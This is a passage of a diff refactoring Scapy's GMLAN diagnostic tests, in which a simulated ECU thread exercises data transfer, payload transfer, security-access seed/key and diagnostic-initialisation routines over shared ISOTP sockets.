sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=1) == False +assert GMLAN_TransferData(isotpsock, 0x4000, payload, timeout=1) == False -drain_bus(iface0) = Positive, long payload conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 @@ -369,66 +343,59 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, - dataRecord=payload*2) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - # second package with inscreased address - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000010, - dataRecord=payload * 2) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, + dataRecord=payload*2) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + # second package with inscreased address + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000010, + dataRecord=payload * 2) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True # -drain_bus(iface0) = Positive, first part of payload succeeds, second pending, then fails, retry succeeds conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x76" - # second package with inscreased address - isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pending = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x78) - isotpsock2.send(pending) - time.sleep(0.1) - nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) - isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) - ack = b"\x76" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x76" + # second package with inscreased address + isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pending = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x78) + isotpsock2.send(pending) + time.sleep(0.1) + nr = GMLAN() / GMLAN_NR(requestServiceId=0x36, returnCode=0x22) + isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x40000000, payload*4, maxmsglen=16, timeout=1, retry=1) == True +thread.join(timeout=5) +assert res ############ -drain_bus(iface0) = Positive, maxmsglen length check -> message is split automatically -* TODO: This test causes an error in ISOTPSoftSockets - -exit_if_no_isotp_module() conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" @@ -437,123 +404,108 @@ sim_started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - if ISOTP_KERNEL_MODULE_AVAILABLE: - isosock = lambda sock: ISOTPSocket(sock, sid=0x642, did=0x242, basecls=GMLAN) - else: - isosock = lambda sock: ISOTPSocket(sock, sid=0x642, did=0x242, basecls=GMLAN, rx_separation_time_min=2) - with new_can_socket0() as isocan, isosock(isocan) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=3, started_callback=sim_started.set) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, - dataRecord=payload*511+payload[:1]) - if len(requ) == 0 or bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - return - ack = b"\x76" - # second package with inscreased address - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000FF9, - dataRecord=payload[1:]) - if len(requ) == 0 or bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - return - ack = b"\x76" - time.sleep(0.1) - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=sim_started.set) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, + dataRecord=payload*511+payload[:1]) + if len(requ) == 0 or bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + return + ack = b"\x76" + # second package with inscreased address + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=3, started_callback=lambda: isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000FF9, + dataRecord=payload[1:]) + if len(requ) == 0 or bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + return + ack = b"\x76" + time.sleep(0.1) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) thread.name = "EcuSimulator" + thread.name - -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - sim_started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x40000000, payload*512, maxmsglen=0x1000000, timeout=8) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +sim_started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x40000000, payload*512, maxmsglen=0x1000000, timeout=8) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ############ Address boundary checks -drain_bus(iface0) = Positive, highest possible address for scheme conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x76" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 2**32 - 1, payload, timeout=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 2**32 - 1, payload, timeout=1) == True +thread.join(timeout=5) +assert res = Negative, invalid address (too large for addressing scheme) -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x76" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 2**32, payload, timeout=1) == False +thread.join(timeout=5) +assert res = Positive, address zero -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x76" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, 0x00, payload, timeout=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, 0x00, payload, timeout=1) == True +thread.join(timeout=5) +assert res = Negative, negative address -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - ack = b"\x76" - isotpsock2.send(ack) + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + ack = b"\x76" + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferData(isotpsock, -1, payload, timeout=1) == False +thread.join(timeout=5) +assert res ############################################ + GMLAN_TransferPayload Tests ############################################ = Positive, short payload -drain_bus(iface0) conf.contribs['GMLAN']['GMLAN_ECU_AddressingScheme'] = 4 payload = b"\x00\x11\x22\x33\x44\x55\x66\x77" ecusimSuccessfullyExecuted = True @@ -561,30 +513,29 @@ started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_RD(memorySize=len(payload)) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x74" - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, - dataRecord=payload) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x76" - time.sleep(0.1) - isotpsock2.send(ack) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_RD(memorySize=len(payload)) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x74" + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) + pkt = GMLAN() / GMLAN_TD(startingAddress=0x40000000, + dataRecord=payload) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + ack = b"\x76" + time.sleep(0.1) + isotpsock2.send(ack) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_TransferPayload(isotpsock, 0x40000000, payload, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_TransferPayload(isotpsock, 0x40000000, payload, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True ############################################ @@ -594,641 +545,570 @@ with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, base keyfunc = lambda seed : seed - 0x1FBE = Positive scenario, level 1, tests if keyfunction applied properly -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_SA(subfunction=1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - # wait for key - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) - time.sleep(0.1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) - isotpsock2.send(nr) - else: - pr = GMLAN()/GMLAN_SAPR(subfunction=2) - isotpsock2.send(pr) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_SA(subfunction=1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + # wait for key + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) + time.sleep(0.1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) + isotpsock2.send(nr) + else: + pr = GMLAN()/GMLAN_SAPR(subfunction=2) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Positive scenario, level 3 -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_SA(subfunction=3) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=3, securitySeed=0xdead) - time.sleep(0.1) - # wait for key - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pkt = GMLAN()/GMLAN_SA(subfunction=4, securityKey=0xbeef) - time.sleep(0.1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) - isotpsock2.send(nr) - else: - pr = GMLAN()/GMLAN_SAPR(subfunction=4) - isotpsock2.send(pr) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_SA(subfunction=3) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=3, securitySeed=0xdead) + time.sleep(0.1) + # wait for key + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pkt = GMLAN()/GMLAN_SA(subfunction=4, securityKey=0xbeef) + time.sleep(0.1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) + isotpsock2.send(nr) + else: + pr = GMLAN()/GMLAN_SAPR(subfunction=4) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=3, timeout=1) == True +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = Negative scenario, invalid password -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN()/GMLAN_SA(subfunction=1) - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - # wait for key - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbabe) - time.sleep(0.1) - if bytes(requ[0]) != bytes(pkt): - nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) - isotpsock2.send(nr) - else: - ecusimSuccessfullyExecuted = False - pr = GMLAN()/GMLAN_SAPR(subfunction=2) - isotpsock2.send(pr) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + pkt = GMLAN()/GMLAN_SA(subfunction=1) + if bytes(requ[0]) != bytes(pkt): + ecusimSuccessfullyExecuted = False + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + # wait for key + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbabe) + time.sleep(0.1) + if bytes(requ[0]) != bytes(pkt): + nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x35) + isotpsock2.send(nr) + else: + ecusimSuccessfullyExecuted = False + pr = GMLAN()/GMLAN_SAPR(subfunction=2) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False - thread.join(timeout=5) - assert res - assert ecusimSuccessfullyExecuted == True +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == False +thread.join(timeout=5) +assert res +assert ecusimSuccessfullyExecuted == True = invalid level (not an odd number) -drain_bus(iface0) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=2, timeout=1) == False +assert GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=2, timeout=1) == False = zero seed -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0x0000) - time.sleep(0.1) - isotpsock2.send(seedmsg) + # wait for request + isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0x0000) + time.sleep(0.1) + isotpsock2.send(seedmsg) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1) == True +thread.join(timeout=5) +assert res ############### retry = Positive scenario, request timeout, retry works -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # timeout - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - # wait for request - requ = isotpsock2.sniff(count=1, timeout=3) - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - # wait for key - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) - pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) - isotpsock2.send(pr) + # timeout + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=3) + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + # wait for key + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) + pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +thread.join(timeout=5) +assert res = Positive scenario, keysend timeout, retry works -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - # timeout - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - # retry from start - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=3) - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - # wait for key - time.sleep(0.1) - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) - isotpsock2.send(pr) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + # timeout + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + # retry from start + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=3) + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + # wait for key + time.sleep(0.1) + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +thread.join(timeout=5) +assert res = Positive scenario, request error, retry works -drain_bus(iface0) started = threading.Event() def ecusim(): - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x37) - time.sleep(0.1) - # wait for request - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) - seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) - time.sleep(0.1) - # wait for key - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) - pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) - pr = GMLAN()/GMLAN_SAPR(subfunction=2) - time.sleep(0.1) - isotpsock2.send(pr) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) + nr = GMLAN() / GMLAN_NR(requestServiceId=0x27, returnCode=0x37) + time.sleep(0.1) + # wait for request + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(nr)) + seedmsg = GMLAN()/GMLAN_SAPR(subfunction=1, securitySeed=0xdead) + time.sleep(0.1) + # wait for key + requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(seedmsg)) + pkt = GMLAN()/GMLAN_SA(subfunction=2, securityKey=0xbeef) + pr = GMLAN()/GMLAN_SAPR(subfunction=2) + time.sleep(0.1) + isotpsock2.send(pr) thread = threading.Thread(target=ecusim) -with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x242, did=0x642, basecls=GMLAN) as isotpsock: - thread.start() - started.wait(timeout=5) - res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True - thread.join(timeout=5) - assert res +sniff(timeout=0.01, opened_socket=[isotpsock, isotpsock2]) +thread.start() +started.wait(timeout=5) +res = GMLAN_GetSecurityAccess(isotpsock, keyfunc, level=1, timeout=1, retry=1) == True +thread.join(timeout=5) +assert res ############################################################################## + GMLAN_InitDiagnostics Tests ############################################################################## = sequence of the correct messages -drain_bus(iface0) ecusimSuccessfullyExecuted = True started = threading.Event() def ecusim(): global ecusimSuccessfullyExecuted ecusimSuccessfullyExecuted= True - with new_can_socket0() as isocan, ISOTPSocket(isocan, sid=0x642, did=0x242, basecls=GMLAN) as isotpsock2: - # DisableNormalCommunication - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=started.set) - pkt = GMLAN(b"\x28") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = b"\x68" - time.sleep(0.1) - # ReportProgrammedState - requ = isotpsock2.sniff(count=1, timeout=1, started_callback=lambda:isotpsock2.send(ack)) - pkt = GMLAN(b"\xa2") - if bytes(requ[0]) != bytes(pkt): - ecusimSuccessfullyExecuted = False - ack = GMLAN()/GMLAN_RPSPR(programmedState=0) - time.sleep(0.1) - # ProgrammingMode requestProgramming - requ = isotpsock2.sniff(count=1, timeout=1, 